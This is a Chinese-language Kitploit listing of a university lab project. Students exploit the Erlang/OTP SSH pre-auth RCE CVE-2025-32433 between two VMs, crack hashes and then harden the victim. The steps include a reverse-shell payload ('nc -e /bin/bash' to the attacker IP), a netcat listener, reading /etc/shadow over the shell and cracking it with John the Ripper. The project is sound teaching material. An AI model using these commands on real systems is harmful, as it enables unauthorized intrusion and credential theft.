Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — 该项目模拟了一个跨越两台虚拟机的真实攻击与防御场景。你将利用Erlang/OTP SSH服务器中的一个关键预认证远程代码执行漏洞(CVE-2025-32433),破解提取出的密码哈希,然后通过防火墙规则和补丁加固受害机器。 | Kitploit
工具/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
密码破解漏洞分析漏洞利用网络安全CTF渗透测试学习与教育实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

该项目模拟了一个跨越两台虚拟机的真实攻击与防御场景。你将利用Erlang/OTP SSH服务器中的一个关键预认证远程代码执行漏洞(CVE-2025-32433),破解提取出的密码哈希,然后通过防火墙规则和补丁加固受害机器。

查看仓库
213个月前尚未审核

信息安全基础 — 2026年春季项目

总分:20分 | 截止日期:不接受迟交

概述

本项目模拟了跨两台虚拟机的真实攻击与防御场景。你将利用 Erlang/OTP SSH 服务器中的一个关键预认证 RCE 漏洞(CVE-2025-32433),破解提取的密码哈希,然后通过防火墙规则和补丁加固受害者机器。

角色操作系统
攻击者Kali Linux
受害者Ubuntu/Debian (Erlang/OTP SSH v27.3.2)

文件

文件描述
Debian-1.ova预构建的受害者虚拟机镜像 — 需单独下载,参见资源 (因过大无法放在 GitHub 上)
Project Spring 2026 - Google Docs.pdf包含成果物的完整项目说明
rockyou_txt.txt用于配合 John the Ripper 破解提取密码哈希的字典文件

资源

  • 受害者虚拟机 (Debian-1.ova): 下载链接 — 文件约 3GB,无法托管在 GitHub 上。请单独下载并按以下说明导入 VirtualBox/VMware。
  • 字典文件 (rockyou_txt.txt): 包含在该仓库中,用于第 2 部分的密码破解步骤。

设置

  1. 导入虚拟机 — 将 Debian-1.ova 和你的 Kali Linux 虚拟机加载到 VirtualBox/VMware 中。
  2. 网络 — 将两台虚拟机设置为 仅主机(Host-Only)适配器,以便它们可以私下通信。
  3. 受害者 IP — 启动受害者虚拟机并运行 ifconfig 查找其 IP(通常在 192.168.56.0/24 网段)。

第 1 部分 — 漏洞 SSH 服务器部署与利用(10 分)

侦察

nmap -p 2222 -sV -A <victim-IP>

记录开放端口、服务版本和 Erlang 签名。

利用 CVE-2025-32433(预认证 RCE)

临时将 Kali 切换为 NAT 以克隆仓库,然后切回仅主机模式。

git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

编辑脚本 — 设置 HOST = "<victim-IP>" 并更新载荷:

command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

终端 1(Kali) — 启动监听器:

nc -lvnp 4444

终端 2(Kali) — 发起利用:

python3 CVE-2025-32433.py

在反弹 shell 中,运行 whoami 和 hostname 确认访问权限。


第 2 部分 — 后渗透与密码破解(5 分)

提取并破解哈希

# 在受害者端(通过反弹 shell)
cat /etc/shadow | grep testuser > hash.txt

# 在 Kali 端
john --wordlist=rockyou_txt.txt hash.txt

记录哈希格式(例如 $6$ = SHA-512)、所用时间以及恢复出的明文密码。

查找 Flag

find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

第 3 部分 — 控制与修复(5 分)

阻止攻击向量(iptables)

sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

在 Kali 上重新运行 Nmap 扫描和漏洞利用 — 记录端口 2222 现在显示为 "Filtered"(已过滤)且利用失败。

修补漏洞

记录将 Erlang/OTP 升级到 v27.3.3 或更高版本(包含 CVE-2025-32433 修复程序)的步骤。


成果物

  • 包含以下截图的完整报告:扫描、漏洞利用执行、反弹 shell(whoami/hostname)、Flag 获取
  • 防火墙前后对比文档(Nmap 结果显示端口状态变化)
  • 书面反思,解释为什么预认证 RCE 比认证后利用显著更危险

CVE 参考

CVE-2025-32433 — Erlang/OTP SSH 服务器中的关键预认证远程代码执行漏洞。攻击者可在任何凭据交换之前发送格式错误的 SSH 数据包加以利用,从而获得未经认证的攻击者完整的 shell 访问权限。

下载工具